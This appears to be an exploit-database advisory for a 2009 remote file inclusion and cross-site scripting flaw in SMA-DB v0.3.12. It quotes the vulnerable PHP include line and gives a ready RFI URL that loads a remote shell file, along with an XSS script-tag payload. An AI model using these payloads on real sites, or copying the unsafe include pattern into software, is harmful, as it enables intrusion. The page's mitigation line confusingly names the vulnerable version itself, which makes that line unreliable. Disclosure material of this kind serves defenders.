Remote File Include/cross site script

vendor:

SMA-DB

by:

ahmadbady

7.5

CVSS

HIGH

Remote File Include/cross site script

CWE

Product Name: SMA-DB

Affected Version From: v0.3.12

Affected Version To: v0.3.12

Patch Exists: YES

Related CWE: N/A

CPE: SMA-DB

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote File Include/cross site script

A vulnerability in SMA-DB v0.3.12 allows remote attackers to include arbitrary files via a URL in the _page_content parameter to theme/format.php, and execute arbitrary code via a URL in the _page_content parameter to startpage.php.

Mitigation:

Update to the latest version of SMA-DB v0.3.12

Source

Exploit-DB raw data:

-----------------:Remote File Include/cross site script:-----------------

script:SMA-DB v0.3.12
   
------------------------------------------------------------------
download from:http://bluevirus.ch/media/downloads/SMA-DB_v0.3.12.zip
   
------------------------------------------------------------------
........................................................
vul:/theme/format.php


<?php include($_page_content);?> line 49

------------------------------------------------------
-----------------------------------------------------
xpl:

http://127.0..0.1/path/theme/format.php?_page_content=[shell.txt?]

xss:
http://127.0.0.1/path/startpage.php/>"><ScRiPt>alert(0)</ScRiPt>

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-02]